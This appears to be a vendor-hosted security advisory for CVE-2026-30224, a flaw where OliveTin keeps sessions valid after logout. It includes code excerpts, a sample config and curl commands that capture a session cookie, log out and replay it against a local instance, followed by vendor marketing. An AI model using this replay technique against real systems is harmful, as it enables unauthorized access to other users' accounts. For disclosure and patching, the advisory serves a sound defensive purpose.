CVE-2026-30224

CVE-2026-30224 is a medium-severity security vulnerability in github.com/OliveTin/OliveTin (go), affecting versions < 0.0.0-20260304233115-d6a0abc3755d15. It is fixed in 0.0.0-20260304233115-d6a0abc3755d15.

Summary

OliveTin does not revoke server-side sessions when a user logs out. Although the browser cookie is cleared, the corresponding session remains valid in server storage until expiry (default ≈ 1 year).

An attacker with a previously stolen or captured session cookie can continue authenticating after logout, resulting in a post-logout authentication bypass.

This is a session management flaw that violates expected logout semantics.

Details

During logout:

// Logout only clears browser cookie
response.Header().Set("Set-Cookie", localCookie.String())

However, the server still accepts the session:

session := sessionStorage.Providers[provider].Sessions[sid]
...
return session

The SID is not deleted from sessionStorage.

Why vulnerable: Logout does not remove the SID from sessionStorage; old cookie is still accepted until expiry (~1 year).

File: api.go, sessions.go, local.go
Lines: api.go:392-427; sessions.go:39-59, 61-80; local.go:32-47
Behavior

  • Login → receive SID cookie
  • Logout → cookie cleared client-side
  • Replay old SID manually → still authenticated

Expected:

  • Logout invalidates session immediately

Actual:

  • Old SID remains usable until expiry

PoC

Minimal config

listenAddressSingleHTTPFrontend: 0.0.0.0:16642
authRequireGuestsToLogin: true

authLocalUsers:
  enabled: true
  users:
    - username: low
      usergroup: users
      password: "$argon2id$..."

actions:
  - title: Dummy
    id: dummy
    shell: "echo dummy"

Reproduction

Login and capture SID:

LOGIN=$(curl -i -X POST http://localhost:16642/api/LocalUserLogin \
  -H 'Content-Type: application/json' \
  -d '{"username":"low","password":"lowpass"}')

SID=$(printf '%s\n' "$LOGIN" | awk -F'[=;]' '/olivetin-sid-local/{print $2}')

Works before logout:

curl -X POST http://localhost:16642/api/WhoAmI \
  -H "Cookie: olivetin-sid-local=$SID"

Logout:

curl -X POST http://localhost:16642/api/Logout \
  -H "Cookie: olivetin-sid-local=$SID"

Replay old cookie:

curl -X POST http://localhost:16642/api/WhoAmI \
  -H "Cookie: olivetin-sid-local=$SID"

Result

User is still authenticated after logout.

Session Management Flaw

  • Logout Bypass
  • Session Replay

Risk:

  • Stolen cookies remain valid
  • Persistent unauthorized access
  • Users falsely believe logout ended the session

Attack scenarios:

  • Shared computers
  • XSS/session theft
  • Proxy logs
  • Malware/browser compromise

Impact

Type:

CVE-2026-30224 has a CVSS score of 5.4 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.0.0-20260304233115-d6a0abc3755d15); upgrading removes the vulnerable code path.

Affected versions

github.com/OliveTin/OliveTin (< 0.0.0-20260304233115-d6a0abc3755d15)

Security releases

github.com/OliveTin/OliveTin → 0.0.0-20260304233115-d6a0abc3755d15 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade github.com/OliveTin/OliveTin to 0.0.0-20260304233115-d6a0abc3755d15 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-30224? CVE-2026-30224 is a medium-severity security vulnerability in github.com/OliveTin/OliveTin (go), affecting versions < 0.0.0-20260304233115-d6a0abc3755d15. It is fixed in 0.0.0-20260304233115-d6a0abc3755d15.
  2. How severe is CVE-2026-30224? CVE-2026-30224 has a CVSS score of 5.4 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/OliveTin/OliveTin are affected by CVE-2026-30224? github.com/OliveTin/OliveTin (go) versions < 0.0.0-20260304233115-d6a0abc3755d15 is affected.
  4. Is there a fix for CVE-2026-30224? Yes. CVE-2026-30224 is fixed in 0.0.0-20260304233115-d6a0abc3755d15. Upgrade to this version or later.
  5. Is CVE-2026-30224 exploitable, and should I be worried? Whether CVE-2026-30224 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-30224 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-30224? Upgrade github.com/OliveTin/OliveTin to 0.0.0-20260304233115-d6a0abc3755d15 or later.

Other vulnerabilities in github.com/OliveTin/OliveTin

CVE-2026-53541CVE-2026-48709CVE-2026-48708CVE-2026-32102CVE-2026-31817

Stop the waste.
Protect your environment with Kodem.